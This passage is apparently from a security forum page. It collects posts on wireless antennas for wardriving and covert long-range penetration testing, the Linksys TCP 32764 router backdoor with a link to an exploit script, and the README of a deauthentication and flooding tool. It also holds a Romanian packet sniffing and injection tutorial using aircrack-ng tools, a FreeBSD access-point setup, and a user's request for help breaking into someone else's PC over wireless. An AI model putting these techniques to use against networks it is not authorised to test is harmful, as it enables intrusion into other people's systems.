the antenna on top of your car is an omnidirectional antenna. These can be used for ‘point-to-multipoint’ purposes such as to serve as the wireless router antenna that transmits signals to all devices in the vicinity [Figure 6]. These are not suitable to be used for point-to-point communications because transmitting signals in all directions, when you want them to go from point A to point B, is an inefficient choice. Suitability for wardriving: These are ideally suited for wardriving, since they grab signals from all directions while you are driving. However, there are some considerations: a 9 dBi omnidirectional antenna would allow you to capture far off signals from all directions, but it will miss access points in high buildings close to your vehicle. To understand why, see Figure 1. Accordingly, it is advised that you choose the correct dBi omnidirectional antenna suited for the areas you are going to drive in. Suitability for penetration testing: During a penetration test, you are aware of your target. Hence, a directional antenna pointed toward the target is more efficient than an omnidirectional antenna. However, you can use a 5 dBi omnidirectional antenna during perimeter testing. Parabolic Antennas Parabolic antennas depend on a curved parabolic surface dish that focuses signals towards a central point [Figure 7]. This enables these antennas to put out incredible gains. However, parabolic antennas are highly directional, which means you need to ensure that they are pointed in the right direction, otherwise they might completely “shield” the signal. Because of their high gain, they are suitable for long range point to point communications. Suitability for wardriving: A parabolic antenna would pick up wireless signals from miles away but only from a single direction at a time. Hence, if you want to map Wi-Fi access points in multiple directions while driving, this is not the best choice. Suitability for penetration testing: Given their long range, parabolic antennas can be very suitable for targeted wireless intrusions, since they allow you to carry out tests from far away once you have positioned them toward target access points. Yagi Antennas Yagi antennas, named after Dr. Hidetsugu Yagi, have a central beam with many individual elements supported by this beam [Figure 8]. These elements constitute radiators and reflectors. A variation is the ‘Vagi’ antenna, which is comprised of two beams side by side. Suitability for wardriving: Yagi antennas are directional, which means they are not the best choice during wardriving. They would pick up far off signals from a particular direction, while missing out on signals in the other directions. Suitability for penetration testing: Like parabolic antennas, Yagi antennas are capable of picking up signals from miles away. Their high gain (e.g. 25 dBi) makes them ideal for penetration testing when you have them pointed towards the target. The Vagi antenna is an attractive choice for penetration testing since they are small and lightweight, yet offer substantial gains. Backfire antennas Backfire antennas are known to have a small size but a significant gain. This makes them a very attractive choice for point-to-point or point-to-multipoint communications. How do they differ from parabolic antennas? There is no parabola; the reflector surface is flat. Their resonant cavity structural design makes them capable of achieving the high gain. For suitability toward wardriving and penetration testing, see ‘Parabolic Antennas’. Building Your Own High Gain Antenna If you have followed this discussion on antennas so far, building your own antenna can be a fun exercise. For this, you will need: About 1-2 inch of 12 gauge copper wire or an omnidirectional antenna A smooth metallic parabolic reflector such as aluminum foil, a can, an 8 inch dumpling strainer, etc. How to Make a Cantenna Cantennas, antennas made out of cans, have been very popular among enthusiasts since they are easy to make and everything you need is in your home. The idea is to use a ‘Pringles’ or similar can, and introduce a copper wire near the bottom from the side of the can [Figure 9]. Calculations regarding the placement of the copper wire need to be precise. You can use this calculator to ensure accuracy. However, if the can is very narrow, you would need to point this antenna very precisely towards the signal direction and even then you would not notice significant gain. Moreover, if you are using a long cable, signals would suffer attenuation. Note: Although a Pringles can is often mentioned, it is not a good can to be used for these purposes since it is too narrow. In fact, any cantenna is a bad choice for serious penetration testing. How to Make a Parabolic Antenna If you have an omnidirectional antenna available [Figure 6], the task becomes easier. Now, all you need to do is find a parabolic reflector that can “turn” this omnidirectional antenna into a parabolic antenna. This parabolic reflector can be any smooth metallic surface that can converge radio signals over the omnidirectional antenna—and this is what improves the antenna gain [Figure 10]. Accurate placement of the omnidirectional antenna in front of the parabolic reflector is of prime significance. There is no increase in antenna gain if an inexperienced person has placed the omnidirectional antenna too far or too close to the parabolic reflector so that it completely misses the focal point. Hence, for accuracy, use this parabolic antenna focal point calculator. Alternatively, if you prefer to avoid making calculations, you can use freely available parabolic reflector templates which have been drawn to scale. These templates explicitly mark the focal point of the parabolic reflector so that you do not have to make calculations. For instance, you can print and use the parabolic reflector template in Figure 11. You would need a square sheet of reflective material that you can place vertically on the straight line drawn in this template, and bend the sheet until it synchronizes with the parabolic curve in the template. Notice the marked focal point (black spot) in the template; place the omnidirectional antenna at that point. Note: We have discussed making parabolic reflectors; however, if you want to build a 2.4 GHz omnidirectional antenna from scratch, it can get quite convoluted. You can follow this link to build such an omnidirectional antenna. Comparison to Commercial Antennas These homemade antennas are capable of giving you results as good as commercial antennas. However, you need to be accurate while building these. Imprecise measurements, design flaws, or implementation errors would result in inefficient antennas with no significant gain. Turning Your Laptop’s Internal Antenna to an External Antenna In case you have some 5 or 7 dBi antennas from your old wireless router lying around [Figure 6], and you want to avoid purchasing a USB antenna unit, you can attach these to your laptop’s built-in internal antenna unit. For this, you will need: U.FL male to RP-SMA pigtail cable Knowledge of laptop disassembly and assembly, and relevant tools Any 2.4 GHz antenna [Figure 6] You would need to disassemble your laptop using required tools and locate the auxiliary antenna connector on the motherboard [Figure 12]. The U.FL side of the cable would fit into this auxiliary connector, and the other side should be fixed along the laptop’s edges such that you can attach your 2.4 GHz external antenna to this SMA (SubMiniature version A) end. Detriments to Wireless Signals Even with the right type of antenna, you may experience weak connections characterized by frequent packet drops and delays. In these situations, one or more of these factors may be the cause: Distance: The most obvious reason is that you are too far from the transmitter. Signals get attenuated over long distances, especially when omnidirectional transmitters are being used, such as those used by common wireless routers. Weather: If an efficient transmitting antenna is being used at the right frequency, weather would have little effect on wireless signals. However, rain can absorb radio signals and enervate Wi-Fi signals at 2.4 GHz. Objects in path: Signals at 2.4 GHz frequency need a clear ‘line-of-sight’ for efficient propagation. This means that trees and walls act as obstructions to the wireless signal. Other access points – If there are other APs in the vicinity that are working on the same channel in crowded areas, this would cause substantial disturbance. Conclusion Wardriving is not illegal as long as you are aware of your limits and avoid nefarious activities such as cracking encryption, retrieving access point passwords, and accessing the Internet for free—known as Piggybacking. For wardriving, you can use a 7 dBi omnidirectional antenna placed on top of your vehicle using a magnetic-mount. For wireless penetration testing scenarios in which you want to breach the security of a particular establishment, it is best to use parabolic reflectors pointed towards the target. Depending on the conditions, these parabolic antennas would allow you carry out wireless penetration tests from a long distance which would lower the risk of being noticed by security personnel. Furthermore, using high gain directional antennas, you are able to ascertain how close to the target perimeter would the potential attackers need to be in order to intrude on wireless communications. A 5 or 7 dBi omnidirectional antenna can be used while testing premises for the presence of rogue access points. References [1] M. Erskine. (2002-2003) www.freeantennas.com. [Online]. Parabolic Templat [2] Tim Pozar. Late Night Software. [Online]. Slide 1 [3] R. Dean Straw, L. B. Cebik, and Dave Hallidy, Eds., ARRL Antenna Book, 22nd ed.: The American Radio Relay League, Inc., October 2011. [4] Frank Thornton Russ Rogers, “Understanding Antennas and Antenna Theory,” in WarDriving and Wireless Penetration Testing.: Syngress, 2007, ch. 2, pp. 31-59. Source
  15. In a blog post, Eloi said that During Christmas Holidays he forgot the admin interface password of his Linksys WAG200G router and in an effort to gain access back of its administration panel, he first scanned the Router and found a suspicious open TCP port i.e. 32764. To do further research on this port service, he downloaded a copy Linksys firmware and reverse-engineered it. He found was a secret backdoor interface that allowed him to send commands to the router from a command-line shell without being authenticated as the administrator. Then he tried to Brute-force the login available at that port, but doing so flips the router's configuration back to factory settings with default router administration username and password. 'The backdoor requires that the attacker be on the local network, so this isn’t something that could be used to remotely attack DSL users. However, it could be used to commandeer a wireless access point and allow an attacker to get unfettered access to local network resources.' He described the complete details of this Serious vulnerability in above slides. After his post, other hackers around the world did further research, that shows that these devices are made by Sercomm, meaning that Cisco, Watchguard, Belkin and various others may be affected as well. Source: Hacking Wireless DSL routers via Administrative password Reset Vulnerability The Python based exploit script can be downloaded from here: https://github.com/elvanderb/TCP-32764 The Complete List of vulnerable devices can be found here: https://github.com/elvanderb/TCP-32764/blob/master/README.md
  16. hwk is an easy-to-use wireless authentication and de-authentication tool. Furthermore, it also supports probe response fuzzing, beacon injection flooding, antenna alignment and various injection testing modes. Information gathering is selected by default and shows the incoming traffic indicating the packet types. /******************************************************************************* * ____ _ __ * * ___ __ __/ / /__ ___ ______ ______(_) /___ __ * * / _ \/ // / / (_-</ -_) __/ // / __/ / __/ // / * * /_//_/\_,_/_/_/___/\__/\__/\_,_/_/ /_/\__/\_, / * * /___/ team * * * * README * * * * DATE * * 8/03/2013 * * * * AUTHOR * * atzeton - http://www.nullsecurity.net/ * * * * LICENSE * * GNU GPLv2, see COPYING * * * ******************************************************************************/ What is hwk? =============== hwk is a collection of packet crafting/network flooding tools: - hawk for flooding the air with preconfigured or non-interactivly gained information - eagle for RADIOTAP WLAN MGT and LLC header packet crafting. It also supports appending random 'payload' WARNING: This is an BETA release since it hasn't been tested sufficiently. Dependencies: ============= - libpcap How to install? =============== make (as root) make install make clean INFO: CAP_NET_RAW, CAP_NET_ADMIN, CAP_SYS_ADMIN (ioctls) capabilities are automatically set during installation. Usage ===== See --help or the man files of hawk/eagle or man files! Bugs ===== If you find any bugs, feel free to drop me a line! Stay tuned ========== * http://nullsecurity.net/ Download HWK Wireless Auditing Tool 0.4 ? Packet Storm
  17. Packet Sniffing si Injecting Frame-urile WLAN: Administrarea frame-urilor: Administrarea frame-urilor este responsabila cu mentinerea comunicarii intre punctele de acces si clientii wireless. Controlul frame-urilor: Controlul frame-urilor este responsabil cu mentinerea unui schimb adecvat de date intre punctul de acces si clientii wireless. Data frame: Transporta datele actuale trimise in reteaua wireless. Acolo nu exista sub-tipuri pentru data frame. Packet Sniffing folosind Wireshark Deschide wireshark din meniu, sau scrie "wireshark" in consola. In meniu il puteti gasi in Application>BackTrack>Information Gathering>Network Analysis>Network Traffic Analysis>wireshark Odata ce s-a deschis WireShark apasa pe "Interface List". O alta fereastra se va deschide cu o lista de interfete ce pot captura packete. Nota: Eu am setat pe mon0. Click pe start, si WireShark va incepe sa captureze packete. Acelea sunt packetele wireless pe care placa wireless le sniff-eaza(n`am gasit alt cuvant). Acum haideti sa scanam packetele de la propriul nostru punct de acces. Pentru a face asta, vom folosi airodump-ng. Airodump-ng este folosit sa captureze packetele wireless ce folosesc WEP encryption in idea ca vei folosi aircrack-ng.(il voi folosi intr-un tutorial cu alta ocazie). Dar, de data asta, haideti sa dezactivam encryption-ul acces point-ului nostru. Acum intra in terminal si scrie: airodump-ng --bssid 00:D9:98:6A:85:b0 mon0[code][i]Nota:[/i] 00:D9:98:6A:85:b0 este adresa MAC a acces point-ului [b]meu[/b]. Pentru a`l gasi pe al tau, in terminal,[code]ifconfig -aDupa ce airodump-ng termina, vei vedea acces point-ul tau cu canalul pe care ruleaza. Acum trebuie sa blocam pe acces point-ul nostru setand placa wireless pe canalul punctului de acces. Pentru asta, root@bt:~# iwconfig mon0 channel 6Unde "6" este canalul acces point-ului). Acum sa revenim la wireshark. Scrie in filter box, wlan.bssid == ADRESA TA MAC) && (wlan.fc.type_subtype == 0×20 Acum vom "sniff-a" numai packetele de la acces point-ul nostru. Packet Injecting Prima data, vrem sa vedem doar packetele non-beacon in wireshark. Dechi deschide wireshark si scrie in filter box: bssid == ADRESA TA MAC) && !(wlan.fc.type_subtype == 0×08).Apoi deschide terminalul si scrie aireplay-ng -9 -e "Wubi" -a ADRESA TA MAC mon0Nota: Inlocuieste Wubi cu numele SSID-ului tau. Acum, daca te intorci la wireshark, ar trebui sa vezi cateva packete care au fost injectate. Acelea sunt doar packete la intamplare ce nu au vreun efect real. Referinte Main Page - BackTrack LinuxBacktrack Tutorials
  18. Scurta introducere: Plecand de la o ideea lui Nytro de a posta un tutorial despre access point pe backtrack, am zis ca ar fi ok sa fac share la un tutorial facut de mine in urma cu 9-10 luni. Cum imi plac lucrurile mai complicate si dorind ceva foarte stabil, AP-ul l-am facut pe FreeBSD. -- Satul de micile cutiute magice folosite pentru Wireless / Routing (Netgear, D-Link), am decis sa-mi fac un AP pe unul din “serverele” cu FreeBSD ce le folosesc acasa pentru lucru. Dezavantajele cutiutelor: Se blocau frecvent, erau instabile. Note: - Placa wireless folosita: Linksys WMP54G. (O vede ca Ralink Technology, Corp) - In tutorial nu am inclus si configurarea protejarii wireless-ului, o sa fac un tutorial separat pentru asta. (Update: S-a facut.) - Test-ul wireless-ului l-am facut dupa un netbook; Screenshot-ul se poate vedea aici. - Pe netbook, am configurat manual adresa IP; Daca doriti sa aloce automat, puteti instala DHCPD. - NAT-ul in firewall este facut catre 10.0.0.12 (Adresa IP dupa placa de retea externala – Nu am specificat nat catre interfata pentru ca este si IPv6) - FreeBSD-ul folosit este 8.2 Release. tex ~ # pciconf -lv .................................... ral0@pci0:1:0:0: card=0x00551737 chip=0x03011814 rev=0x00 hdr=0x00 vendor = 'Ralink Technology, Corp.' device = 'Edimax 54 MBit WLan 802.11g rt 2500 (b8341462)' class = network tex ~ # ifconfig ral0 ral0: flags=8802<BROADCAST,SIMPLEX,MULTICAST> metric 0 mtu 2290 ether 00:16:b6:5d:73:05 media: IEEE 802.11 Wireless Ethernet autoselect (autoselect) status: no carrier tex ~ # dmesg |grep ral ral0: <Ralink Technology RT2561S> mem 0xfbef8000-0xfbefffff irq 17 at device 0.0 on pci1 ral0: MAC/BBP RT2661B, RF RT2527 ral0: [ITHREAD] ppc0: <Parallel port> port 0x378-0x37f irq 7 on acpi0 ppbus0: <Parallel port bus> on ppc0 ppi0: <Parallel I/O> on ppbus0 tex ~ # ifconfig wlan1 create wlandev ral0 wlanmode hostap tex ~ # ifconfig wlan1 up scan SSID/MESH ID BSSID CHAN RATE S:N INT CAPS FRITZ!Box o... 00:24:fe:ac:7b:35 1 54M -93:-95 100 EPS RSN WPA WME HTCAP ATH WPS LINUX SECUR... 00:1b:2f:f6:d5:12 11 54M -83:-95 100 EPS RSN WPA WME tex ~ # tex ~ # ifconfig wlan1 192.168.0.1 netmask 255.255.255.0 ssid RTFM channel 11 tex ~ # ifconfig wlan1 wlan1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500 ether 00:16:b6:5d:73:05 inet6 fe80::216:b6ff:fe5d:7305%wlan1 prefixlen 64 scopeid 0x7 inet 192.168.0.1 netmask 0xffffff00 broadcast 192.168.0.255 nd6 options=3<PERFORMNUD,ACCEPT_RTADV> media: IEEE 802.11 Wireless Ethernet autoselect mode 11g <hostap> status: running ssid RTFM channel 11 (2437 MHz 11g) bssid 00:16:b6:5d:73:05 country US authmode OPEN privacy OFF txpower 0 scanvalid 60 protmode CTS dtimperiod 1 -dfs tex ~ # pico /etc/rc.conf ............ wlans_ral0="wlan1" create_args_wlan1="wlanmode hostap mode 11g" ifconfig_wlan1="inet 192.168.0.1 netmask 0xffffff00 ssid RTFM channel 11" ............ tex ~ # pico /etc/pf.conf ............ nat from 192.168.0.0/24 to any -> 10.0.0.12 ............ tex ~ # /etc/rc.d/pf reload Reloading pf rules. tex ~ # sysctl net.inet.ip.forwarding=1 net.inet.ip.forwarding: 0 -> 1 tex ~ # echo 'net.inet.ip.forwarding=1' >> /etc/sysctl.conf tex ~ # ifconfig -m wlan1 wlan1: flags=8843<UP,BROADCAST,RUNNING,SIMPLEX,MULTICAST> metric 0 mtu 1500 ether 00:16:b6:5d:73:05 inet 192.168.0.1 netmask 0xffffff00 broadcast 192.168.0.255 inet6 fe80::216:b6ff:fe5d:7305%wlan1 prefixlen 64 scopeid 0x7 nd6 options=3<PERFORMNUD,ACCEPT_RTADV> media: IEEE 802.11 Wireless Ethernet autoselect mode 11g <hostap> status: running supported media: media OFDM/54Mbps mode autoselect mediaopt hostap media OFDM/48Mbps mode autoselect mediaopt hostap media OFDM/36Mbps mode autoselect mediaopt hostap media OFDM/24Mbps mode autoselect mediaopt hostap media OFDM/18Mbps mode autoselect mediaopt hostap media OFDM/12Mbps mode autoselect mediaopt hostap media OFDM/9Mbps mode autoselect mediaopt hostap media OFDM/6Mbps mode autoselect mediaopt hostap media DS/11Mbps mode autoselect mediaopt hostap media DS/5.5Mbps mode autoselect mediaopt hostap media DS/2Mbps mode autoselect mediaopt hostap media DS/1Mbps mode autoselect mediaopt hostap media OFDM/54Mbps mode 11g mediaopt hostap media OFDM/48Mbps mode 11g mediaopt hostap media OFDM/36Mbps mode 11g mediaopt hostap media OFDM/24Mbps mode 11g mediaopt hostap media OFDM/18Mbps mode 11g mediaopt hostap media OFDM/12Mbps mode 11g mediaopt hostap media OFDM/9Mbps mode 11g mediaopt hostap media OFDM/6Mbps mode 11g mediaopt hostap media DS/11Mbps mode 11g mediaopt hostap media DS/5.5Mbps mode 11g mediaopt hostap media DS/2Mbps mode 11g mediaopt hostap media DS/1Mbps mode 11g mediaopt hostap media autoselect mode 11g mediaopt hostap media DS/11Mbps mode 11b mediaopt hostap media DS/5.5Mbps mode 11b mediaopt hostap media DS/2Mbps mode 11b mediaopt hostap media DS/1Mbps mode 11b mediaopt hostap media autoselect mode 11b mediaopt hostap media autoselect mode autoselect mediaopt hostap ssid RTFM channel 11 (2462 MHz 11g) bssid 00:16:b6:5d:73:05 country US authmode OPEN privacy OFF txpower 0 scanvalid 60 protmode CTS dtimperiod 1 -dfs tex ~ # Alte note: - Daca doriti sa va faceti o jucarie de genul si nu pricepeti ceva, va pot ajuta. - O sa includ in acest thread inca un howto, pentru protejarea AP-ului.
  19. Ubertooth is an open source 2.4 GHz wireless development platform suitable for passive bluetooth monitoring. It aims to be the world’s first open source and affordable bluetooth monitoring and development platform. Open source hardware and software. Download Ubertooth from SourceForge.net [r434]
  20. Salut , imi puteti spune si mie cum pot intra in pc-ul unei persoane care are conectat un router sau wireless la pc si functia printer and sharing activata ? Cum ma pot conecta prin wireless la pc-u lui avand access la tot pc-u ?
×
×
  • Create New...